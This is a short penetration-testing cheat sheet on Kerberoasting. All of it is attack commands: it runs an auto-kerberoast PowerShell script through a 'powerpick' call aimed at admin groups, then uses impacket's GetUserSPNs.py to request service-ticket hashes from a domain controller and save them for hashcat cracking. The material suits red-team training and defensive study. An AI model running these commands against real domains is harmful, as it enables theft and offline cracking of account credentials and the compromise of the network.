$ powershell-import autokerberoast.ps1
$ powerpick invoke-autokerberoast -Groupname "*admin*"
$ python3 GetUserSPNs.py -request -dc-ip <DC IP HERE> Domain/User
$ python GetUserSPNs.py -request -dc-ip <DC IP> <Domain>/<Username> -outputfile hashcat -debug
^ With this way, we can get a hash to crack with hashcat
For more commands / info, check out Rubeus
Last updated 3 years ago